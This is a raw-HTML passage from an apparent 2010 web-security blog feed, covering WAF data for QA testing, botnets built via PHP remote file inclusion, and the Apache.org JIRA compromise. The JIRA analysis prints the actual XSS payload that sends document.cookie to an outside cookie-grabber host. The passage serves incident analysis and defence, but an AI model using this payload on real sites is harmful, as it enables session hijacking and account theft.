border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.2#st1.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST1.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.2#st1.2" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">facilitate security mindset</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.2#st1.2" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">share security results with QA</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.1#st2.1" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST2.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.1#st2.1" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">use encapsulated attacker perspective</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.1#st2.1" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">integrate black box security tools into the QA process (including protocol fuzzing)</a></td><td rowspan="3" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?l=2#2" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">2</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.2#st2.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST2.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.2#st2.2" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">start security testing in familiar functional territory</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.2#st2.2" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">allow declarative security/security features to drive tests</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.3#st2.3" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST2.3</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.3#st2.3" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">move beyond functional testing to attacker's perspective</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st2.3#st2.3" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">begin to build/apply adversarial security tests (abuse cases)</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.1#st3.1" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST3.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.1#st3.1" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">include security testing in regression</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.1#st3.1" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">include security tests in QA automation</a></td><td rowspan="4" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?l=3#3" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">3</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.2#st3.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST3.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.2#st3.2" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">teach tools about your code</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.2#st3.2" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">perform fuzz testing customized to application APIs</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.3#st3.3" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST3.3</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.3#st3.3" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">probe risk claims directly</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.3#st3.3" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">drive tests with risk analysis results</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.4#st3.4" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST3.4</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.4#st3.4" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">drive testing depth</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st3.4#st3.4" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">leverage coverage analysis</a><div><br /></div></td></tr></tbody></table></span></div><div><ul><li><b>ST1.1 - Execute adversarial tests beyond functional</b> </li></ul></div><div>The other group that really benefits from the detailed logging produced by WAFs are Quality Assurance (QA) teams. QA teams are typically in a great position in the SDLC phase to potentially catch a large number of defects, however they are typically not security folks and their test cases are focused almost exclusively on functional defects. We have seen a tremendous benefit at organizations where WAF data that is captured in production is then fed to the QA teams where they extract out the malicious request data from the event report and they create new Abuse Cases for future testing of applications.</div><div><ul><li><b>ST3.4 - Drive testing depth</b></li></ul></div><div><a href="http://jeremiahgrossman.blogspot.com/2006/07/5-challenges-of-web-application.html">Application testing coverage is difficult</a>. How can you ensure that your DAST tool has been able to enumerate and test out a high percentage of your site's content? Another benefit of learning WAFs is that they are able to create a SITE profile tree of all dynamic (non-static resources such as images, etc...) resources and their parameters. It is therefore possible to export out the WAF's SITE tree so that it may be integrated into the DAST data to be reconciled. I have seen examples of this where the WAF was able to identify various nooks-n-crannies deep within web applications where the automated tools just weren't able to reach on their own. Now that the DAST tool is aware of the resource location and injection points, it is much easier to test the resource properly.</div><div><br /></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-54702236303363063892010-05-14T10:28:00.016-04:002010-05-14T11:36:40.425-04:00Botnet Herders Targeting Web Servers<b><i>Submitted by Ryan Barnett 5/14/2010</i></b><div><br /></div><div>Numerous media outlets have <a href="http://www.computerworld.com.au/mediareleases/10623/imperva-discovers-more-dangerous-ddos-attack/">reported on a "new" DDoS botnet</a> that is targeting web servers as zombie participants vs. standard user computers. The motivation for targeting web servers includes:</div><div><ol><li>Web servers are always online where as home computer systems are often shutdown when not in use. This means that the number of botnet systems in control at any one time is variable. This factors into the botnet owner's service offerings as they are often selling their botnet services and having a reliable, strong botnet is key.</li><li>Web servers have more network bandwidth than home computer users. This essentially is a Quality of Service metric where commercial web servers are guaranteed specific amounts of network bandwidth usage whereas home computer users typically have much less bandwidth. Additionally, home user network traffic is oftentimes throttled which would make their DDoS attack traffic less.</li><li>Web servers have more horse power then home computers. The number of CPUs, RAM, etc... means that commercial servers can generate much more network DDoS traffic then home computer systems.</li><li>Web servers are less likely to be blacklisted by ISP vs. home computer systems. This means that web server botnet zombies will be online, sending traffic much longer than home computers. </li></ol></div><div>Essentially, web server botnet participants are like "Super Soldiers" compared to normal grunts in the botnet army.</div><div><br /></div><div><b>While the information presented by the media is interesting data, it is by no means a new tactic.</b></div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_E0YEPhKPc2k/S-1nISN85wI/AAAAAAAAAH8/m57EMAdgXfk/s1600/botnet_herding1.JPG"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 239px;" src="http://1.bp.blogspot.com/_E0YEPhKPc2k/S-1nISN85wI/AAAAAAAAAH8/m57EMAdgXfk/s320/botnet_herding1.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5471142514351990530" /></a><br /><div>How do I know this? Because we (Breach Security) reported on this exact same concept 2 years ago in our <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">WASC Web Hacking Incident Database</a> Annual Report <a href="http://www.ideainformationsecurity.com/2008-summit/The%20Web%20Hacking%20Incidents%20Database%20-%20Current.ppt">Presentation Slides</a>. <a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_E0YEPhKPc2k/S-1pD7Fc0II/AAAAAAAAAIE/SyLjFEgVwN4/s1600/botnet_herding2.JPG"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="http://3.bp.blogspot.com/_E0YEPhKPc2k/S-1pD7Fc0II/AAAAAAAAAIE/SyLjFEgVwN4/s320/botnet_herding2.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5471144638446096514" /></a><br />What we showed was that botnet operators have been using PHP Remote File Inclusion (RFI) attacks to try and exploit web servers in order to download DDoS client code. This will force these systems into participating in DDoS attacks. RFI attacks are still a big problem and a surprising number of sites are still vulnerable even though newer versions of PHP have a more secure default configuration that prevents this exploit from working. As it happens with other types of software, organizations are just not able to upgrade their software in a timely manner to the newest versions that fix the flaws. </div><div><br /></div><div>It is a shame that the <a href="http://www.owasp.org/index.php/Top_10_2010-Release_Notes">new OWASP Top 10 Most Critical Web Application Security Risks</a> release has removed the old A3: Malicious File Execution category as RFIs were included in it. The stated rationale for removing this is -</div><div><span class="Apple-style-span" style=" line-height: 19px; font-family:sans-serif;font-size:13px;"><blockquote><i>REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.</i></blockquote></span></div><div>While I don't disagree with some of this rationale, the fact is that there are still many, many sites that are vulnerable to RFI attacks and recruiting the compromised web site into a Botnet Army is just one of the possible bad outcomes...</div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-76162332968665723172010-04-14T17:03:00.006-04:002010-04-15T11:48:25.584-04:00Apache.org Compromised Through XSS<i>Submitted By Ryan Barnett 04/14/2010</i><div><br /></div><div>One of the latest entries into the <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">WASC</a><a href="http://projects.webappsec.org/Web-Hacking-Incident-Database"> Web Hacking Incident Database (</a><a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">WHID</a><a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">),</a> deserves highlighting.</div><div><div></div><blockquote><div><b>Entry Title:</b> WHID 2010-67: Apache.org hit by targeted XSS attack, passwords compromised</div><div><b>WHID ID:</b> 2010-67</div><div><b>Date Occured:</b> April 9, 2010</div><div><b>Attack Method:</b> Cross Site Scripting (XSS), Brute Force</div><div><b>Application Weakness:</b> Improper Output Handling</div><div><b>Outcome:</b> Session Hijacking</div><div><b>Incident Description:</b> On April 5th, the attackers via a compromised Slicehost server opened a new issue, INFRA-2591. This issue contained the following text:</div><div>ive got this error while browsing some projects in jira http://tinyurl.com/XXXXXXXXX [obscured]</div><div>Tinyurl is a URL redirection and shortening tool. This specific URL redirected back to the Apache instance of JIRA, at a special URL containing a cross site scripting (XSS) attack. The attack was crafted to steal the session cookie from the user logged-in to JIRA. When this issue was opened against the Infrastructure team, several of our administators clicked on the link. This compromised their sessions, including their JIRA administrator rights.</div><div><b>Attack Source Geography: </b></div><div><b>Attacked Entity Field: </b>Technology</div><div><b>Attacked Entity Geography: </b>USA</div><div>Reference: <a href="http://blogs.zdnet.com/security/?p=6123&tag=nl.e539">http://blogs.zdnet.com/security/?p=6123&tag=nl.e539</a></div></blockquote><div></div><div>The end URL destination that the attackers send the Apache admins to was this (with some data obscured) -</div></div><div><blockquote>https://obscured/path/to/vuln/page.jsp?vulnerable_parameter_name=name;}catch(e){}%0D%0A--></script><noscript><meta%20http-equiv="refresh"%20content="0;url=http://pastie.org/904699"></noscript><br /><script>document.write('<<b>img%20src="http://teap.zzl.org/teap.php?data='%2bdocument.cookie%2b'"/>');</b>window.location="http://pastie.org/904699";<br /></script><script><!--&defaultColor=';try{//</blockquote>As you can see, the attack is using some html/javascript tricks to force the user's browser to send the "document.cookie" DOM object data off site to the attacker's cookie grabber app (teap.php). The attack payload is using an easy browser trick by placing the javascript data inside of an html IMG tag which makes it possible to bypass the DOM restrictions about different domains access cookie data from other domains.</div><div><br /></div><div>Here is how the XSS payloads looks if echoed back from JIRA -</div><div><blockquote><div><script language="JavaScript" type="text/javascript"></div><div><!--</div><div>var defaultColor = ''<b>;try{//';</b></div><div>var choice = false;</div><div>var openerForm = opener.document.jiraform;</div><div>var openerEl = opener.document.jiraform.name;<b>}catch(e){}</b></div><div><b>--></script><noscript><meta equiv="refresh" content="0;url=http://pastie.org/904699"></noscript><script>document.write('<img src="http://teap.zzl.org/teap.php?data='+document.cookie+'" />');window.location="http://pastie.org/904699";</script><script><!--;</b></div><div>function colorIn(color) {</div><div> if (!choice) {</div><div> openerEl.value = color;</div><div> document.f.colorVal.value = color;</div><div> }</div><div>}</div></blockquote><div>This attack also highlights the fact that URL Shortener applications (such as tinyurl in this case) can be abused by attackers to hide the destination URL payloads. There was some recent research done by ZScaler entitled "<a href="http://research.zscaler.com/2010/03/are-url-shorteners-really-dangerous.html">Are URL Shorteners Really Dangerous</a>" however it only focused on malware attacks through URL Shorteners and not XSS attack payloads. As you can see, URL Shorteners are still dangerous as they can dupe and end user into clicking on it as there is no way to tell if the end URL is dangerous or not until you actually click on it. This scenario is another great reason why a browser plugin such as <a href="http://noscript.net/">NoScript</a> is so important. As a test, I clicked on the same tinyurl link in Firefox with NoScript and got a warning message and this data was logged in the console -</div></div><div><blockquote><b>[NoScript XSS] Sanitized suspicious request. </b>Original URL [https://obscured/path/to/vuln/page.jsp?vulnerable_parameter_name=name;}catch(e){}%0D%0A--%3E%3C/script%3E%3Cnoscript%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%220;url=http://pastie.org/904699%22%3E%3C/nos<br />cript%3E%3Cscript%3Edocument.write(%27%3Cimg%20src=%22http://teap.zzl.org/teap.php?data=%27%2bdocument.cookie%2b%27%22/%3E%27);window.location=%22http://pastie.org/904<br />699%22;%3C/script%3E%3Cscript%3E%3C!--&defaultColor=%27;try{//] <b>requested from [chrome://browser/content/browser.xul]. Sanitized URL:</b> [https://obscured/path/to/vuln/page.jsp?vulnerable_parameter_name=NAME%3B%7Dcatch%20e%20%7B%7D%20-%3E%20%2Fscript%3E%20noscript%3E%20meta%20http-equiv=%20refresh%20content=%200%3Burl=http://pastie.org/904699%22%3E%3C/noscri<br />pt%3E%3Cscript%3Edocument.write(%27%3Cimg%20src=%20http%3A%2F%2Fteap.zzl.org%2Fteap.php%3F<br />data=%20%2BDOCUMENT.COOKIE%2B%20%20%2F%3E%20%20%3Bwindow.LOCATION=%20http%3A%2F%2Fp<br />astie.org%2F904699%20%3B%20%2Fscript%3E%20script%3E%20!-&defaultColor=%20%3Btry%7B%2F%2F#376924726542634355].</blockquote><b>Thank You NoScript!</b></div><div><b><br /></b></div><div><b>Update - </b>I also tested Google Chrome's XSS prevention (comparing inbound payloads with outbound response body data) and it seemed to work as it did not execute the XSS code and the Developer tools console showed this message -</div><div><br /></div><div><span class="Apple-style-span" style=" color: rgb(255, 0, 0); white-space: pre-wrap; font-family:monospace;font-size:medium;">Refused to execute a JavaScript script. Source code of script found within request.</span></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-63340757173819825442010-04-08T11:27:00.004-04:002010-04-14T17:03:12.018-04:00German Government Pays Hacker For Stolen Bank Account Data<i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">By Ryan Barnett 04/08/2010</span></span></i><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><br /></span></span></div><div> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><!--StartFragment--><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">The </span></span><a href="https://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd?filter33485=&filter33487=2010-64&filter33477=&filter38336=&filter33483=&filter33473=&filter33465=&filter33467=&filter33469=&filter33471=&filter33475=&filter33479=&filter33481=&filter35431=#////////////filter33487:MjAxMC02NA==//"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">latest entry to the <span class="blsp-spelling-error" id="SPELLING_ERROR_0">WASC</span> Web Hacking Incident Database (<span class="blsp-spelling-error" id="SPELLING_ERROR_1">WHID</span>)</span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"> is pretty interesting (below). The attack method is currently unknown (most likely candidate is <span class="blsp-spelling-error" id="SPELLING_ERROR_2">SQL</span> Injection due to bulk extraction of account holder data) however this story is a really good discussion topic and is why it is being included in <span class="blsp-spelling-error" id="SPELLING_ERROR_3">WHID</span> at this time. </span></span></p><p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><br /></span></span></p> <p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">The short of it 